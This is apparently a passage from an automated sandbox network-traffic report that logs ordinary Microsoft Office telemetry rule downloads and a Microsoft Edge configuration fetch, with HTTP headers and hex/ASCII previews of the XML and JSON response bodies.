                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:32 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    39192.168.2.74976813.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:34 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:34 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 5810d2d2-301e-0000-6891-3feecc000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080634Z-174f78459685m244hC1EWRgp2c0000000wf0000000006hvq
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:34 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    40192.168.2.74976713.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:34 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:34 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: dc0e5a4e-901e-005b-0191-3f2005000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080634Z-174f7845968zgtf6hC1EWRqd8s0000000pg000000000cs7c
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:34 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    41192.168.2.74976513.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:34 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:34 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 494
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB8972972"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: baa0830a-001e-0082-4291-3f5880000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080634Z-174f7845968j6t2phC1EWRcfe80000000wvg0000000037rp
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:35 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    42192.168.2.74976913.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:36 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:36 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 486
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: fac497c4-501e-008f-4391-3f9054000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080636Z-174f7845968nxc96hC1EWRspw80000000w9g00000000b2gg
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:36 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    43192.168.2.74977313.107.43.164438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:36 UTC747OUTGET /config/v1/Edge/117.0.2045.47?clientId=-2063246587742936609&agents=Edge%2CEdgeConfig%2CEdgeServices%2CEdgeFirstRun%2CEdgeFirstRunConfig%2CEdgeDomainActions&osname=win&client=edge&channel=stable&scpfull=0&scpguard=0&scpfre=0&scpver=0&osarch=x86_64&osver=10.0.19045&wu=1&devicefamily=desktop&uma=0&sessionid=5&mngd=0&installdate=1696491615&edu=0&bphint=2&soobedate=1696491610&fg=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: config.edge.skype.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    If-None-Match: "xDkc0HT9c2ekfj/3J+6x4yELW+Knys1OtBnWqRtJUmw="
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC843INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache,max-age=3600
                                                                                                                                                                                                                                                                                                                    Content-Length: 58423
                                                                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                                                                    Expires: Wed, 27 Nov 2024 09:06:37 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "D+Gl3jOUb1CvSiGwbQ2cPbPUqR3R1IiN5tdWp31hBis="
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                    Report-To: {"group":"NelEcsUpload1","max_age":604800,"endpoints":[{"url":"https://ecs.nel.measure.office.net?TenantId=Edge&DestinationEndpoint=Edge-Prod-BL2r8b&FrontEnd=AFD"}],"include_subdomains":true}
                                                                                                                                                                                                                                                                                                                    NEL: {"report_to":"NelEcsUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                                                                                                                                                                                                                                                                                                                    X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                                                                    X-MSEdge-Ref: Ref A: 557A502175E843D7952F0ED850422A62 Ref B: BL2AA2030101007 Ref C: 2024-11-27T08:06:36Z
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:36 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC3355INData Raw: 7b 22 45 43 53 22 3a 7b 22 45 78 63 6c 75 64 65 45 78 74 65 72 6e 61 6c 43 6f 6e 66 69 67 49 64 73 49 6e 4c 6f 67 22 3a 74 72 75 65 2c 22 43 6f 6e 66 69 67 4c 6f 67 54 61 72 67 65 74 22 3a 22 65 64 67 65 5f 73 74 61 62 6c 65 22 7d 2c 22 45 64 67 65 22 3a 7b 22 44 69 73 63 6f 6e 6e 65 63 74 65 64 45 72 72 6f 72 50 61 67 65 56 61 72 69 61 74 69 6f 6e 73 22 3a 7b 22 65 6e 61 62 6c 65 46 65 61 74 75 72 65 73 22 3a 5b 22 6d 73 53 68 6f 77 54 72 6f 75 62 6c 65 73 68 6f 6f 74 42 75 74 74 6f 6e 4f 6e 45 72 72 6f 72 50 61 67 65 22 2c 22 6d 73 44 69 73 63 6f 6e 6e 65 63 74 65 64 45 72 72 6f 72 50 61 67 65 56 61 72 69 61 74 69 6f 6e 32 22 5d 7d 2c 22 50 68 6f 65 6e 69 78 43 75 73 74 6f 6d 54 68 65 6d 65 22 3a 7b 22 65 6e 61 62 6c 65 46 65 61 74 75 72 65 73 22 3a 5b
                                                                                                                                                                                                                                                                                                                    Data Ascii: {"ECS":{"ExcludeExternalConfigIdsInLog":true,"ConfigLogTarget":"edge_stable"},"Edge":{"DisconnectedErrorPageVariations":{"enableFeatures":["msShowTroubleshootButtonOnErrorPage","msDisconnectedErrorPageVariation2"]},"PhoenixCustomTheme":{"enableFeatures":[
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC8192INData Raw: 22 4b 69 6c 6c 73 77 69 74 63 68 52 65 61 75 74 68 44 69 61 6c 6f 67 22 3a 7b 22 64 69 73 61 62 6c 65 46 65 61 74 75 72 65 73 22 3a 5b 22 6d 73 4e 75 72 74 75 72 69 6e 67 53 68 6f 77 52 65 61 75 74 68 53 69 67 6e 49 6e 43 54 41 44 69 61 6c 6f 67 22 5d 7d 2c 22 44 69 73 61 62 6c 65 57 65 62 47 50 55 53 75 70 70 6f 72 74 4d 65 74 72 69 63 73 22 3a 7b 22 64 69 73 61 62 6c 65 46 65 61 74 75 72 65 73 22 3a 5b 22 43 6f 6c 6c 65 63 74 57 65 62 47 50 55 53 75 70 70 6f 72 74 4d 65 74 72 69 63 73 22 5d 7d 2c 22 4d 79 57 69 6e 43 6f 50 69 6c 6f 74 49 63 6f 6e 22 3a 7b 22 65 6e 61 62 6c 65 46 65 61 74 75 72 65 73 22 3a 5b 22 6d 73 55 6e 64 65 72 73 69 64 65 57 69 6e 43 6f 70 69 6c 6f 74 4e 78 74 42 72 61 6e 64 22 5d 7d 2c 22 4c 6f 61 64 53 74 61 74 69 73 74 69 63 73
                                                                                                                                                                                                                                                                                                                    Data Ascii: "KillswitchReauthDialog":{"disableFeatures":["msNurturingShowReauthSignInCTADialog"]},"DisableWebGPUSupportMetrics":{"disableFeatures":["CollectWebGPUSupportMetrics"]},"MyWinCoPilotIcon":{"enableFeatures":["msUndersideWinCopilotNxtBrand"]},"LoadStatistics
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC4144INData Raw: 61 6d 65 22 3a 22 4f 70 74 4f 75 74 22 2c 22 74 79 70 65 22 3a 22 50 72 69 73 6d 45 78 70 6c 6f 72 65 72 54 79 70 65 4f 70 74 4f 75 74 22 7d 5d 2c 22 61 70 70 6c 69 63 61 74 69 6f 6e 73 22 3a 5b 7b 22 64 6f 6d 61 69 6e 22 3a 22 32 6d 64 6e 2e 6e 65 74 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 4f 70 74 4f 75 74 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 69 6d 67 2d 73 2d 6d 73 6e 2d 63 6f 6d 2e 61 6b 61 6d 61 69 7a 65 64 2e 6e 65 74 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 4f 70 74 4f 75 74 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 61 7a 75 72 65 77 65 62 73 69 74 65 73 2e 6e 65 74 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 4f 70 74 4f 75 74 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 62 69 6e 67 2d 65 78
                                                                                                                                                                                                                                                                                                                    Data Ascii: ame":"OptOut","type":"PrismExplorerTypeOptOut"}],"applications":[{"domain":"2mdn.net","applied_policy":"OptOut"},{"domain":"img-s-msn-com.akamaized.net","applied_policy":"OptOut"},{"domain":"azurewebsites.net","applied_policy":"OptOut"},{"domain":"bing-ex
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC8192INData Raw: 6d 70 74 22 2c 22 64 6f 6d 61 69 6e 22 3a 22 77 77 77 2e 74 65 6c 65 67 72 61 70 68 69 6e 64 69 61 2e 63 6f 6d 22 7d 2c 7b 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 50 72 6f 6d 70 74 22 2c 22 64 6f 6d 61 69 6e 22 3a 22 74 69 6d 65 73 6f 66 69 6e 64 69 61 2e 69 6e 64 69 61 74 69 6d 65 73 2e 63 6f 6d 22 7d 2c 7b 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 50 72 6f 6d 70 74 22 2c 22 64 6f 6d 61 69 6e 22 3a 22 70 75 73 68 65 6e 67 61 67 65 2e 63 6f 6d 22 7d 2c 7b 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 50 72 6f 6d 70 74 22 2c 22 64 6f 6d 61 69 6e 22 3a 22 77 77 77 2e 74 69 6d 65 73 6e 6f 77 6e 65 77 73 2e 63 6f 6d 22 7d 2c 7b 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 50 72 6f 6d 70 74 22 2c 22 64 6f 6d 61 69 6e
                                                                                                                                                                                                                                                                                                                    Data Ascii: mpt","domain":"www.telegraphindia.com"},{"applied_policy":"Prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"Prompt","domain":"pushengage.com"},{"applied_policy":"Prompt","domain":"www.timesnownews.com"},{"applied_policy":"Prompt","domain
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC8192INData Raw: 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 43 68 72 6f 6d 65 55 41 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 61 73 74 72 6f 67 6f 2e 61 73 74 72 6f 2e 63 6f 6d 2e 6d 79 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 43 68 72 6f 6d 65 55 41 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 61 70 70 2e 63 6c 61 73 73 6b 69 63 6b 2e 63 6f 6d 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 43 68 72 6f 6d 65 55 41 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 65 78 63 68 61 6e 67 65 73 65 72 76 69 63 65 63 65 6e 74 65 72 2e 63 6f 6d 22 2c 22 70 61 74 68 5f 6d 61 74 63 68 22 3a 5b 22 2f 66 72 65 65 7a 65 22 5d 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 43 68 72 6f 6d 65 55 41 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 62 61 6e 63 6f 64
                                                                                                                                                                                                                                                                                                                    Data Ascii: lied_policy":"ChromeUA"},{"domain":"astrogo.astro.com.my","applied_policy":"ChromeUA"},{"domain":"app.classkick.com","applied_policy":"ChromeUA"},{"domain":"exchangeservicecenter.com","path_match":["/freeze"],"applied_policy":"ChromeUA"},{"domain":"bancod
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC8192INData Raw: 61 69 6e 22 3a 22 68 6f 6d 65 2e 69 62 6f 74 74 61 2e 63 6f 6d 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 43 68 72 6f 6d 65 55 41 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 76 61 63 63 69 6e 65 72 65 67 2e 68 65 61 6c 74 68 2e 6e 64 2e 67 6f 76 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 43 68 72 6f 6d 65 55 41 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 77 77 77 2e 63 6f 6d 61 73 73 76 61 78 2e 6f 72 67 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 43 68 72 6f 6d 65 55 41 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 77 77 77 2e 6d 74 72 65 61 64 79 63 6c 69 6e 69 63 2e 6f 72 67 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 43 68 72 6f 6d 65 55 41 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 77 77 77 2e
                                                                                                                                                                                                                                                                                                                    Data Ascii: ain":"home.ibotta.com","applied_policy":"ChromeUA"},{"domain":"vaccinereg.health.nd.gov","applied_policy":"ChromeUA"},{"domain":"www.comassvax.org","applied_policy":"ChromeUA"},{"domain":"www.mtreadyclinic.org","applied_policy":"ChromeUA"},{"domain":"www.
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:37 UTC8192INData Raw: 6f 4e 6f 74 4f 76 65 72 72 69 64 65 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 6c 6f 67 69 6e 2e 77 69 6e 64 6f 77 73 2d 70 70 65 2e 6e 65 74 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 44 6f 4e 6f 74 4f 76 65 72 72 69 64 65 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 65 61 67 6c 65 78 2e 69 63 2e 67 6f 76 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 44 6f 4e 6f 74 4f 76 65 72 72 69 64 65 22 7d 2c 7b 22 64 6f 6d 61 69 6e 22 3a 22 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 6d 69 63 72 6f 73 6f 66 74 2e 73 63 6c 6f 75 64 22 2c 22 61 70 70 6c 69 65 64 5f 70 6f 6c 69 63 79 22 3a 22 44 6f 4e 6f 74 4f 76 65 72 72 69 64 65 22 7d 2c 7b 22 64 6f 6d
                                                                                                                                                                                                                                                                                                                    Data Ascii: oNotOverride"},{"domain":"login.windows-ppe.net","applied_policy":"DoNotOverride"},{"domain":"login.microsoftonline.eaglex.ic.gov","applied_policy":"DoNotOverride"},{"domain":"login.microsoftonline.microsoft.scloud","applied_policy":"DoNotOverride"},{"dom
